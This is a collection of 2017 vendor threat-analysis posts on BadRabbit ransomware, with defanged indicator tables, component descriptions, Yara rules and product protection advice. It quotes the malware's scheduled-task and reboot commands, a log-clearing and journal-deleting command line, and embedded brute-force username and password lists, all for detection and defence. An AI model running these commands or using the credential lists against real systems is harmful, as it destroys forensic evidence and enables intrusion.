sarktur[.]com

http://38.84.134[.]15/Core/Engine/Index/default

v1

school12.cn[.]ua

http://172.97.69[.]79/i/

v1

sinematurk[.]com

http://91.236.116[.]50/Core/Engine/Index/two

v1

vgoru[.]org

http://172.97.69[.]79/i/

v1

www.2000[.]ua

http://172.97.69[.]79/i/

v1

www.444android[.]com

http://172.97.69[.]79/i/

v1

www.444android[.]com

http://91.236.116[.]50/Core/Engine/Index/two

v1

www.aica.co[.]jp

http://38.84.134[.]15/Core/Engine/Index/default

v1

www.alapli.bel[.]tr

http://91.236.116[.]50/Core/Engine/Index/two

v1

www.ambilet[.]ro

http://185.149.120[.]3/scholargoogle/

v2

www.andronova[.]net

http://91.236.116[.]50/Core/Engine/Index/two

v1

www.chnu.edu[.]ua

http://172.97.69[.]79/i/

v1

www.dermavieskin[.]com

https://bodum-online[.]gq/Core/Engine/Index/three

v1

www.evrosmazki[.]ua

http://172.97.69[.]79/i/

v1

www.hercegnovi[.]me

http://38.84.134[.]15/Core/Engine/Index/two

v1

www.len[.]ru

http://185.149.120[.]3/scholasgoogle/

v2

www.montenegro-today[.]com

http://38.84.134[.]15/Core/Engine/Index/two

v1

www.montenegro-today[.]com

http://91.236.116[.]50/Core/Engine/Index/two

v1

www.otbrana[.]com

http://38.84.134[.]15/Core/Engine/Index/default

v1

www.pensionhotel[.]be

http://38.84.134[.]15/Core/Engine/Index/default

v1

www.pensionhotel[.]cz

http://38.84.134[.]15/Core/Engine/Index/default

v1

www.pensionhotel[.]de

http://172.97.69[.]79/i/

v1

www.pensionhotel[.]de

http://38.84.134[.]15/Core/Engine/Index/default

v1

www.pensionhotel[.]dk

http://38.84.134[.]15/Core/Engine/Index/default

v1

www.pensionhotel[.]nl

http://38.84.134[.]15/Core/Engine/Index/default

v1

www.pensionhotel[.]pl

http://38.84.134[.]15/Core/Engine/Index/default

v1

www.pensionhotel[.]ro

http://46.20.1[.]98/scholargoogle/

v1

www.pensionhotel[.]sk

http://38.84.134[.]15/Core/Engine/Index/default

v1

www.sinematurk[.]com

http://91.236.116[.]50/Core/Engine/Index/two

v1

www.t.ks[.]ua

http://172.97.69[.]79/i/

v1

www.teknolojihaber[.]net

http://91.236.116[.]50/Core/Engine/Index/two

v1

www.uscc[.]ua

http://172.97.69[.]79/i/

v1

www.vertizontal[.]ro

http://91.236.116[.]50/Core/Engine/Index/three

v1

www.visa3777[.]com

http://172.97.69[.]79/i/

v1

www.www.pensionhotel[.]de

http://38.84.134[.]15/Core/Engine/Index/default

v1

Table 2: Additional sites hosting BACKSWING profilers and associated receivers

The distribution of sites compromised with BACKSWING suggest a motivation other than financial gain. FireEye observed this framework on compromised Turkish sites and Montenegrin sites over the past year. We observed a spike of BACKSWING instances on Ukrainian sites, with a significant increase in May 2017. While some sites hosting BACKSWING do not have a clear strategic link, the pattern of deployment raises the possibility of a strategic sponsor with specific regional interests.

BADRABBIT Components

BADRABBIT is made up of several components, as described in Figure 5.


Figure 5: BADRABBIT components

Install_flashPlayer.exe (MD5: FBBDC39AF1139AEBBA4DA004475E8839)

The install_flashplayer.exe payload drops infpub.dat (MD5: C4F26ED277B51EF45FA180BE597D96E8) to the C:\Windows directory and executes it using rundll32.exe with the argument C:\Windows\infpub.dat,#1 15. This execution format mirrors that of EternalPetya.

infpub.dat (MD5: 1D724F95C61F1055F0D02C2154BBCCD3)

The infpub.dat binary is the primary ransomware component responsible for dropping and executing the additional components shown in the BADRABBIT Components section. An embedded RSA-2048 key facilitates the encryption process, which uses an AES-128 key to encrypt files. The extensions listed below are targeted for encryption:

.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip

The following directories are ignored during the encryption process:

  • \Windows
  • \Program Files
  • \ProgramData
  • \AppData

The malware writes its ransom message to the root of each affected drive with the filename Readme.txt.

The infpub.dat is capable of performing lateral movement via WMI or SMB. Harvested credentials provided by an embedded Mimikatz executable facilitate the infection of other systems on the network. The malware contains lists of common usernames, passwords, and named pipes that it can use to brute-force other credentials for lateral movement.

If one of four Dr.Web antivirus processes is present on the system, file encryption is not performed. If the malware is executed with the “-f” command line argument, credential theft and lateral movement are bypassed.

dispci.exe (MD5: B14D8FAF7F0CBCFAD051CEFE5F39645F)

The dispci.exe binary interacts with the DiskCryptor driver (cscc.dat) to install the malicious bootloader. If one of three McAfee antivirus processes is running on the system, dispci.exe is written to the %ALLUSERSPROFILE% directory; otherwise, it is written to C:\Windows. The sample is executed on system start using a scheduled task named rhaegal.

cscc.dat (MD5s: B4E6D97DAFD9224ED9A547D52C26CE02 or EDB72F4A46C39452D1A5414F7D26454A)

A 32 or 64-bit DiskCryptor driver named cscc.dat facilitates disk encryption. It is installed in the :\Windows directory as a kernel driver service named cscc.

Mimikatz usage (MD5s: 37945C44A897AA42A66ADCAB68F560E0 or 347AC3B6B791054DE3E5720A7144A977)

A 32 or 64-bit Mimikatz variant is written a temporary file (e.g., 651D.tmp) in the C:\Windows directory and executed by passing a named pipe string (e.g., \\.\pipe\{8A93FA32-1B7A-4E2F-AAD2-76A095F261DC}) as an argument. Harvested credentials are passed back to infpub.dat via the named pipe, similar to EternalPetya.

BADRABBIT Compared to EternalPetya

The infpub.dat contains a checksum algorithm like the one used in EternalPetya. However, the initial checksum value differs slightly: 0x87654321 in infpub.dat, 0x12345678 in EternalPetya. infpub.dat also supports the same command line arguments as EternalPetya with the addition of the “-f” argument, which bypasses the malware’s credential theft and lateral movement capabilities.

Like EternalPetya, infpub.dat determines if a specific file exists on the system and will exit if found. The file in this case is cscc.dat. infpub.dat contains a wmic.exe lateral movement capability, but unlike EternalPetya, does not contain a PSEXEC binary used to perform lateral movement.

Both samples utilize the same series of wevtutil and fsutil commands to perform anti-forensics:

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %SYSTEMDRIVE%

FireEye Detections

Product

Detection Names

NX,EX,AX,FX,ETP

malware.binary.exe, Trojan.Ransomware.MVX, Exploit.PossibleWaterhole.BACKSWING

HX

BADRABBIT RANSOMWARE (FAMILY), Gen:Heur.Ransom.BadRabbit.1, Gen:Variant.Ransom.BadRabbit.1

TAP

WINDOWS METHODOLOGY [Scheduled Task Created], WINDOWS METHODOLOGY [Service Installation], WINDOWS METHODOLOGY [Audit Log Cleared], WINDOWS METHODOLOGY [Rundll32 Ordinal Arg], WINDOWS METHODOLOGY [Wevtutil Clear-log], WINDOWS METHODOLOGY [Fsutil USN Deletejournal], WINDOWS METHODOLOGY [Multiple Admin Share Failures]

We would like to thank Edward Fjellskål for his assistance with research for this blog.

Indicators

File: Install_flashPlayer.exe
Hash: FBBDC39AF1139AEBBA4DA004475E8839
Description: install_flashplayer.exe drops infpub.dat

File: infpub.dat
Hash: 1D724F95C61F1055F0D02C2154BBCCD3
Description: Primary ransomware component

File: dispci.exe
Hash: B14D8FAF7F0CBCFAD051CEFE5F39645F
Description: Interacts with the DiskCryptor driver (cscc.dat) to install the malicious bootloader, responsible for file decryption.

File: cscc.dat
Hash: B4E6D97DAFD9224ED9A547D52C26CE02 or EDB72F4A46C39452D1A5414F7D26454A
Description: 32 or 64-bit DiskCryptor driver

File: <rand_4_hex>.tmp
Hash: 37945C44A897AA42A66ADCAB68F560E0 or 347AC3B6B791054DE3E5720A7144A977
Description: 32 or 64-bit Mimikatz variant

File: Readme.txt
Hash: Variable
Description: Ransom note

Command: \system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Description: Runs the primary ransomware component of BADRABBIT. Note that “15” is the default value present in the malware and may be altered by specifying a different value on command line when executing install_flash_player.exe.

Command: %COMSPEC% /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "<%COMSPEC%> /C Start \"\" \"<dispci_exe_path>\" -id
Description: Creates the rhaegal scheduled task

Command: %COMSPEC% /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%WINDIR%\system32\shutdown.exe /r /t 0 /f" /ST <HH:MM:00>
Description: Creates the drogon scheduled task

Command: %COMSPEC% /c schtasks /Delete /F /TN drogon
Description: Deletes the drogon scheduled task

Command: %COMSPEC% /c wswevtutil cl Setup & wswevtutil cl System & wswevtutil cl Security & wswevtutil cl Application & fsutil usn deletejournal /D <current_drive_letter>:
Description: Anti-forensics

Scheduled Task Name: rhaegal
Scheduled Task Run: "<%COMSPEC%> /C Start \"\" \"<dispci_exe_path>\" -id <rand_task_id> && exit"
Description: Bootloader interaction

Scheduled Task Name: drogon
Scheduled Task Run: "%WINDIR%\system32\shutdown.exe /r /t 0 /f"
Description: Forces a reboot

Service Name: cscc
Service Display Name: Windows Client Side Caching DDriver
Service Binary Path: cscc.dat

Embedded usernames from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
Administrator
Admin
Guest
User
User1
user-1
Test
root
buh
boss
ftp
rdp
rdpuser
rdpadmin
manager
support
work
other user
operator
backup
asus
ftpuser
ftpadmin
nas
nasuser
nasadmin
superuser
netguest
alex
Embedded passwords from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
Administrator
administrator
Guest
guest
User
user
Admin
adminTest
test
root
123
1234
12345
123456
1234567
12345678
123456789
1234567890
Administrator123
administrator123
Guest123
guest123
User123
user123
Admin123
admin123Test123
test123
password
111111
55555
77777
777
qwe
qwe123
qwe321
qwer
qwert
qwerty
qwerty123
zxc
zxc123
zxc321
zxcv
uiop
123321
321
love
secret
sex
god
Embedded pipe names from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
atsvc
browser
eventlog
lsarpc
netlogon
ntsvcs
spoolss
samr
srvsvc
scerpc
svcctl
wkssvc

Yara Rules

rule FE_Hunting_BADRABBIT {
        meta:version=".2"
        filetype="PE"
        author="ian.ahl @TekDefense & nicholas.carr @itsreallynick"
        date="2017-10-24"
        md5 = "b14d8faf7f0cbcfad051cefe5f39645f"
strings:
        // Messages
        $msg1 = "Incorrect password" nocase ascii wide
        $msg2 = "Oops! Your files have been encrypted." ascii wide
        $msg3 = "If you see this text, your files are no longer accessible." ascii wide
        $msg4 = "You might have been looking for a way to recover your files." ascii wide
        $msg5 = "Don't waste your time. No one will be able to recover them without our" ascii wide
        $msg6 = "Visit our web service at" ascii wide
        $msg7 = "Your personal installation key#1:" ascii wide
        $msg8 = "Run DECRYPT app at your desktop after system boot" ascii wide
        $msg9 = "Password#1" nocase ascii wide
        $msg10 = "caforssztxqzf2nm.onion" nocase ascii wide
        $msg11 = /partition (unbootable|not (found|mounted))/ nocase ascii wide

        // File references
        $fref1 = "C:\\Windows\\cscc.dat" nocase ascii wide
        $fref2 = "\\\\.\\dcrypt" nocase ascii wide
        $fref3 = "Readme.txt" ascii wide
        $fref4 = "\\Desktop\\DECRYPT.lnk" nocase ascii wide
        $fref5 = "dispci.exe" nocase ascii wide
        $fref6 = "C:\\Windows\\infpub.dat" nocase ascii wide
        // META
        $meta1 = "http://diskcryptor.net/" nocase ascii wide
        $meta2 = "dispci.exe" nocase ascii wide
        $meta3 = "GrayWorm" ascii wide
        $meta4 = "viserion" nocase ascii wide
        //commands
        $com1 = "ComSpec" ascii wide
        $com2 = "\\cmd.exe" nocase ascii wide
        $com3 = "schtasks /Create" nocase ascii wide
        $com4 = "schtasks /Delete /F /TN %ws" nocase ascii wide
condition:
        (uint16(0) == 0x5A4D)
        and
        (8 of ($msg*) and 3 of ($fref*) and 2 of ($com*))
        or
        (all of ($meta*) and 8 of ($msg*))
    }

rule FE_Trojan_BADRABBIT_DROPPER
    {
        meta:
            author = "muhammad.umair"
            md5 = "fbbdc39af1139aebba4da004475e8839"
            rev = 1
        strings:
            $api1 = "GetSystemDirectoryW" fullword
            $api2 = "GetModuleFileNameW" fullword
            $dropped_dll = "infpub.dat" ascii fullword wide
            $exec_fmt_str = "%ws C:\\Windows\\%ws,#1 %ws" ascii fullword wide
            $extract_seq = { 68 ?? ?? ?? ?? 8D 95 E4 F9 FF FF 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 C4 00 00 00 8D 85 A8 ED FF FF 50 8D 8D AC ED FF FF E8 ?? ?? ?? ?? 85 C0 0F 84 AA 00 00 00 }
        condition:
            (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them
    }

rule FE_Worm_BADRABBIT
    {
        meta:
            author = "muhammad.umair"
            md5 = "1d724f95c61f1055f0d02c2154bbccd3"
            rev = 1
        strings:
            $api1 = "WNetAddConnection2W" fullword
            $api2 = "CredEnumerateW" fullword
            $api3 = "DuplicateTokenEx" fullword
            $api4 = "GetIpNetTable"
            $del_tasks = "schtasks /Delete /F /TN drogon" ascii fullword wide
            $dropped_driver = "cscc.dat" ascii fullword wide
            $exec_fmt_str = "%ws C:\\Windows\\%ws,#1 %ws" ascii fullword wide
            $iter_encrypt = { 8D 44 24 3C 50 FF 15 ?? ?? ?? ?? 8D 4C 24 3C 8D 51 02 66 8B 31 83 C1 02 66 3B F7 75 F5 2B CA D1 F9 8D 4C 4C 3C 3B C1 74 07 E8 ?? ?? ?? ?? }
            $share_fmt_str = "\\\\%ws\\admin$\\%ws" ascii fullword wide
        condition:
            (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them
    }

rule FE_Trojan_BADRABBIT_MIMIKATZ
    {
        meta:
            author = "muhammad.umair"
            md5 = "37945c44a897aa42a66adcab68f560e0"
            rev = 1
        strings:
            $api1 = "WriteProcessMemory" fullword
            $api2 = "SetSecurityDescriptorDacl" fullword
            $api_str1 = "BCryptDecrypt" ascii fullword wide
            $mimi_str = "CredentialKeys" ascii fullword wide
            $wait_pipe_seq = { FF 15 ?? ?? ?? ?? 85 C0 74 63 55 BD B8 0B 00 00 57 57 6A 03 8D 44 24 1C 50 57 68 00 00 00 C0 FF 74 24 38 4B FF 15 ?? ?? ?? ?? 8B F0 83 FE FF 75 3B }
        condition:
            (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them
    }

rule FE_Trojan_BADRABBIT_DISKENCRYPTOR
    {
        meta:
            author = "muhammad.umair"
            md5 = "b14d8faf7f0cbcfad051cefe5f39645f"
            rev = 1
        strings:
            $api1 = "CryptAcquireContextW" fullword
            $api2 = "CryptEncrypt" fullword
            $api3 = "NetWkstaGetInfo" fullword
            $decrypt_seq = { 89 5D EC 78 10 7F 07 3D 00 00 00 01 76 07 B8 00 00 00 01 EB 07 C7 45 EC 01 00 00 00 53 50 53 6A 04 53 8B F8 56 89 45 FC 89 7D E8 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 5F }
            $msg1 = "Disk decryption progress..." ascii fullword wide
            $task_fmt_str = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" ascii fullword wide
            $tok1 = "\\\\.\\dcrypt" ascii fullword wide
            $tok2 = "C:\\Windows\\cscc.dat" ascii fullword wide
        condition:
            (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 150KB and all of them
    }         

How McAfee Products Can Protect Against BadRabbit Ransomware

McAfee is leading the way enterprises protect against emerging threats such as BadRabbit ransomware, remediate complex security issues, and combat attacks with an intelligent end-to-end security platform that provides adaptable and continuous protection as a part of the threat defense life cycle.

McAfee had zero-day protection for components of the initial BadRabbit attack in the form of behavioral, heuristic, application control, and sandbox analyses. This post provides an overview of those protections with the following products:

Frequently updated technical details can be found in the McAfee Knowledge Center article KB89335. We will update this post as more product information becomes available.

McAfee Endpoint Protection (ENS)

Dynamic Application Control (DAC) successfully provided our customers with zero-day protection from BadRabbit ransomware and prevented any potential damage from occurring when “Security” mode is enabled.

In addition, McAfee Endpoint Security mitigation methods for assorted malware are available in the following product guide.

Access Protection Rules: Setting up access protection rules to prevent the creation of the following files prevents the ransomware from executing and encrypting files:

  • C:\Windows\cscc.dat
  • C:\Windows\infpub.dat
  • C:\Windows\dispci.exe

The following screenshots show steps for creating rules for McAfee ENS:

Figure 1.

Figure 2. 

Figure 3.

Figure 4.

McAfee VirusScan Enterprise (VSE)

The following screenshots show steps for creating Access Protection Rules for McAfee VirusScan Enterprise (VSE). For VSE, one rule must be created for each file mentioned in the behavior section:

Figure 5.

Figure 6.

Figure 7.

Enabling Joint Threat Intelligence (JTI) Rules 239 and 242 also prevents the ransomware from executing.

McAfee Threat Intelligence Exchange (TIE)

McAfee Threat Intelligence Exchange (TIE) further enhances a customer’s security posture. With the ability to aggregate reputation verdicts from ENS, VSE, McAfee Web Gateway, and McAfee Network Security Platform, TIE can quickly share reputation information related to BadRabbit with any integrated vector. By providing the ability to use Global Threat Intelligence (GTI) for a global reputation query, TIE also enables integrated products to make an immediate decision prior to execution of the ransomware payload, and leverage the reputation cached in the TIE database.

There are currently three samples associated with this ransomware campaign, representing the dropper and the main executable that could be added manually. (GTI automatically updates these file hashes.)

  • 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
  • 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93
  • 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648

 

McAfee Network Security Platform (NSP)

McAfee NSP is one product that quickly responds to prevent exploits and protect assets within networks. The McAfee NSP team works diligently to develop and deploy user-defined signatures (UDS) for critical matters. Within a 24-hour period, several UDS were created and uploaded for customers to deploy on their network sensors. In this case, the UDS explicitly targeted the exploit tools EternalBlue, Eternal Romance SMB Remote Code Execution, and DoublePulsar. There were also related indicators of compromise released that could be added to a blacklist to block potential threats associated with the original Trojan.

A Network Security Platform Emergency User Defined Signature (UDS) has been created to detect this threat. The UDS and its release notes are available for download from Knowledge Base article KB55447.

IMPORTANT:
Use Emergency_UDS_1.zip with NSM versions 8.1.x.x and 8.3.x.x
Use Emergency_UDS_2.zip with NSM version 9.1.x.x

Please read the release notes carefully for important information.

Knowledge Base article KB55447 is available only to registered users. Log in to https://support.mcafee.com and search for the article ID.

McAfee products using DAT files 

On October 25, McAfee released on DAT 8695 to include coverage for BadRabbit ransomware and variants.

The post How McAfee Products Can Protect Against BadRabbit Ransomware appeared first on McAfee Blogs.

Following The Bad Rabbit

On October 24th, media outlets reported on an outbreak of ransomware affecting various organizations in Eastern Europe, mainly in Russia and Ukraine. Identified as “Bad Rabbit”, initial reports about the ransomware drew comparisons with the WannaCry and NotPetya (EternalPetya) attacks from earlier this year. Though F-Secure hasn’t yet received any reports of infections from our own customers, we’re actively investigating. And while the investigation is still ongoing, initial results from our analysis did find similarities between Bad Rabbit and the NotPetya ransomware that hit companies late last June.

We think there’s good evidence that suggests the same person or group is responsible for both last June’s NotPetya attacks and what we’re seeing now with Bad Rabbit. Malware authors often learn from what works, so finding the same characteristics in different families is not uncommon. But the similarities we’re seeing here are too much to be just one attacker copying another.

Without getting too technical, here’s a handful of the similarities between NotPetya and Bad Rabbit:

  • Overall code structure is similar
  • File encryption code is VERY similar
  • Similar method of checking existing processes and encrypting files
  • Similar method used to reboot computers
  • Same trick used to launch the malware’s main component as a DLL
  • Identical code used to parse the command line
  • Similar propagation methods, including an identical “library” of other computers found in the network, and use of Mimikatz to gather credentials
  • Out of 113 file extensions used by BadRabbit, 65 are shared with NotPetya (Bad Rabbit has an additional 48)

There are also some notable differences between the two, including:

  • Bad Rabbit doesn’t use EternalBlue/EternalRomance exploit
  • Bad Rabbit doesn’t use PsExec to spread
  • Bad Rabbit also encrypts “home user” files, such as .jpgs
  • Bad Rabbit adds “.encrypted” to the contents of affected files (NotPetya didn’t do this, making it harder to distinguish between encrypted and non-encrypted files)
  • Bad Rabbit’s infection vector is via compromised websites. While NotPetya was reported to be via MeDoc
  • Bad Rabbit brute-forces using a set of predefined credentials to available SMB shares
  • The list of process hashes to be compared to are different from NotPetya. NotPetya compares against Symantec and Kaspersky processes, while Bad Rabbit compares against McAfee and DrWeb

Like NotPetya, Bad Rabbit will display the two ransom note – one for MBR encryption.

Bad Rabbit Message

And a text note for file encryption.

Oops! Your files have been encrypted.

If you see this text, your files are no longer accessible.
You might have been looking for a way to recover your files.
Don't waste your time. No one will be able to recover them without our
decryption service.

We guarantee that you can recover all your files safely. All you
need to do is submit the payment and get the decryption password.

Visit our web service at caforssztxqzf2nm.onion

Your personal installation key#2: [REDACTED]

Users are directed to pay the ransom at a specified payment site, which also provides the amount of the ransom to be paid.

Bad Rabbit Payment Site

A threat description of the Bad Rabbit ransomware is available at Trojan:W32/Rabbad and will be updated as and when more details are confirmed.

In the meantime… our endpoint protection products have a variety of measures baked in that prevent Bad Rabbit infections.


Edited to update: Struckthrough EternalRomance mention above. We have verified the same observations as Cisco Talos Security about EternalRomance exploited by Bad Rabbit.

Neue Ransomware: Dieses Mal ist der Wolf im Hasenpelz unterwegs

Seit gestern ist eine neue Ransomwarewelle unterwegs, die bislang vor allem Russland, die Ukraine und Teile von Europa im Visier hat. Unser SophosLabs-Spezialist Chester Wisniewski hat sich „Bad Rabbit“ einmal näher angeschaut und ist nicht wirklich überrascht über dessen Auftritt. „Es war wohl tatsächlich nur eine Frage der Zeit, bis irgendjemand die Ideen und Techniken, […]

‘BadRabbit’ Ransomware Burrows Into Russia, Ukraine

This post was researched and written by Christiaan Beek, Tim Hux, David Marcus, Charles McFarland, Douglas McKee, and Raj Samani.

McAfee is currently investigating a ransomware campaign known as BadRabbit, which initially infected targets in Russia and the Ukraine. We are also investigating reports of infected systems in Germany, Turkey, and Bulgaria and will provide updates as more information becomes available. For McAfee product coverage, please see “How McAfee Products Can Protect Against BadRabbit Ransomware.”

When victims visit the following site, a dropper is downloaded:

hxxp://1dnscontrol[dot]com/flash_install.php

After infection, the victim sees the following screen:

The ransomware is currently charging 0.05 Bitcoin; however, there is no confirmation that paying the ransom will result in a decryption key being provided.

A decryption site at the following .onion (Tor) domain displays the time that victims have left before the price goes up:

caforssztxqzf2nm[dot]onion

Files with the following extensions are encrypted:

.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf .der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key .mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx .php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff .vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.

The malware starts a command-line with following values:

Cmd /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR “C:\Windows\system32\cmd.exe /C Start \”\” \”C:\Windows\dispci.exe\” -id 1082924949 && exit”

“/TN rheagal” refers to a system account with the name rhaegal used to create the scheduled task and start the ransomware file dispci.exe. Rhaegal is likely a reference to a dragon from the popular TV show “Game of Thrones.” In fact, three dragon names—Rhaegal, Viserion, and Drogon—are used in relation to the following scheduled tasks:

The malware then uses the following commands to clear security logs and delete the update sequence number (USN) change journal, which is used to recover files, for example:

Cmd /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:

The USN change journal provides a persistent log of all changes made to files on the volume, according to the Microsoft Developer Network. As files, directories, and other NTFS objects are added, deleted, and modified, NTFS enters records into the USN change journal, one for each volume on the computer. Each record indicates the type of change and the object changed. New records are appended to the end of the stream.

We also found a DNS query to ACA807(x)ipt.aol[dot]com, in which the “##” is a two-digit hex number from 00-FF ACA807##.ipt.aol[dot]com.

We created a graph of the events occurring during an infection by one of the BadRabbit samples. The initial binary loads itself into memory and kills the initial process. Further processes drop configuration, services files, and other artifacts used in the attacks. The graph ends with the creation of the preceding scheduled tasks.

Embedded Credentials

One of the samples (579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648) seems to contain a list of default credentials with an attempt to brute-force credentials and get the scheduled tasks to execute the ransomware:

  • secret
  • 123321
  • zxc321
  • zxc123
  • qwerty123
  • qwerty
  • qwe321
  • qwe123
  • 111111
  • password
  • test123
  • admin123Test123
  • Admin123
  • user123
  • User123
  • guest123
  • Guest123
  • administrator123
  • Administrator123
  • 1234567890
  • 123456789
  • 12345678
  • 1234567
  • 123456
  • adminTest
  • administrator
  • netguest
  • superuser
  • nasadmin
  • nasuser
  • ftpadmin
  • ftpuser
  • backup
  • operator
  • other user
  • support
  • manager
  • rdpadmin
  • rdpuser
  • user-1
  • Administrator

Game of Thrones Fans?

It is common for attackers to use pop-culture references in their attacks. These attackers seem to have an interest in “Game of Thrones,” with at least three references to the series. Viserion, Rhaegal, and Drogon are names of scheduled tasks. GrayWorm, the name of a “Game of Thrones” commander, is the product name in the binary’s EXIF data.

Detection

There are currently three samples associated with this ransomware campaign, representing the dropper and the main executable. McAfee detects all three:

  • 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
  • 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93
  • 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648

 

The post ‘BadRabbit’ Ransomware Burrows Into Russia, Ukraine appeared first on McAfee Blogs.

Stopping ransomware where it counts: Protecting your data with Controlled folder access

Windows Defender Exploit Guard is a new set of host intrusion prevention capabilities included with Windows 10 Fall Creators Update. One of its features, Controlled folder access, stops ransomware in its tracks by preventing unauthorized access to your important files.

Encryption should protect your data and files. Ransomware twists the power of encryption against you and uses it to take files hostage. This means losing control of your data: documents, precious photos and videos, and other important files.

For enterprises and small businesses, losing access to files can mean disrupted operations. Worse, for critical infrastructure, ransomware infection can halt the delivery of services. Just this year, successive ransomware campaigns and no less than two global outbreaks immobilized hospitals, transport systems, and other high-tech facilities.

Ransomware continues to evolve and impact many types of devices in different environments. At Microsoft, we continue to harden Windows 10 against ransomware and other threats. Our end-to-end security suite integrates multiple next-generation defense technologies that help our customers prevent, detect, and respond to ransomware attacks.

Controlled folder access adds another layer of real-time protection against ransomware.

Crackdown on unauthorized encryption

Ransomware campaigns continue to grow and thrive as they are a lucrative business for cybercriminals. Ransomware gets into a victim’s device, encrypting files and data. Because these files are held hostage, cybercriminals can extort money from their victims.

Controlled folder access brings you right back in control of determining what programs can access your data. This feature protects your files from tampering, in real-time, by locking folders so that ransomware and other unauthorized apps can’t access them. It’s like putting your crown jewels in a safe whose key only you hold.

Cybercriminals can’t extort money if they can’t encrypt your files. Controlled folder access is a powerful tool that can render ransomware attacks worthless.

How Controlled folder access works

Controlled folder access locks down folders, allowing only authorized apps to access files. Unauthorized apps, including malicious executable files, DLLs, and scripts are denied access to folders.

This feature can be enabled in Windows Defender Security Center app in Windows 10.

By default, Controlled folder access protects common folders where documents and other important data are stored. But it’s also flexible. You can add additional folders to protect, including those on other drives. You can also allow apps that you trust to access protected folders, so if you’re using unique or custom programs, your productivity is not affected.

When enabled, Controlled folder access prevents access by unauthorized apps and notifies you of an attempt to access or modify files in protected folders. It delivers this protection in real-time.

Enabling and managing Controlled folder access in enterprise networks

In enterprise environments, Controlled folder access can also be enabled and managed using Group Policy, PowerShell, or configuration service providers for mobile device management.

The Controlled folder access feature seamlessly integrates with Windows Defender Advanced Threat Protection. Every time Controlled folder access blocks an attempt to make changes to protected folders, an alert is generated on Windows Defender ATP. This notifies security operations personnel to take quick response actions, including quarantining affected machines or blocking the unauthorized app from running on other machines.

As with the other Windows Defender Exploit Guard features, administrators can customize notifications that appear on endpoints in the event of an intrusion attempt. Customized notifications then allow employees to call, email, or IM their company’s help desk.

Controlled folder access and other Windows Defender Exploit Guard features include an audit mode that administrators can use to evaluate these security features in enterprise networks. In audit mode, the Controlled folder feature does not block attempts to modify files on protected folders, but logs all events, so administrators can assess Windows Defender Exploit Guard capabilities without impacting operations.

A comprehensive suite of advanced ransomware protection in Windows 10

Ransomware attacks grow more and more sophisticated every day. To keep you safe, we are continually improving Windows to protect against ransomware and other threats. Windows 10 is the safest version of Windows yet. Controlled folder access is designed to help reduce the risk of ransomware attacks, keeping your user and businesses data safe.

 

Tanmay Ganacharya (@tanmayg)

Principal Group Manager, Windows Defender Research

 

Note these additional Windows security features

Windows 10 S is a configuration of Windows 10 that’s streamlined for security and performance. Windows 10 S provides Microsoft-vetted security by working exclusively with apps from the Windows Store and by using Microsoft Edge as the default browser.

Windows 10 customers are also protected from ransomware with Windows Defender Antivirus. With advanced machine learning models, as well as generic and heuristic techniques Windows Defender Antivirus detects new as well as never-before-seen ransomware in real-time.

Microsoft Edge blocks ransomware infection from the web by opening pages within low privilege app containers and by using reputation-based blocking of malicious downloads. Microsoft Edge has been providing industry-leading online protection for Windows 10 customers since its release. This year, Microsoft Edge is now available on iOS and Android, so users of these platforms can start benefiting from browser security beyond sandboxing.

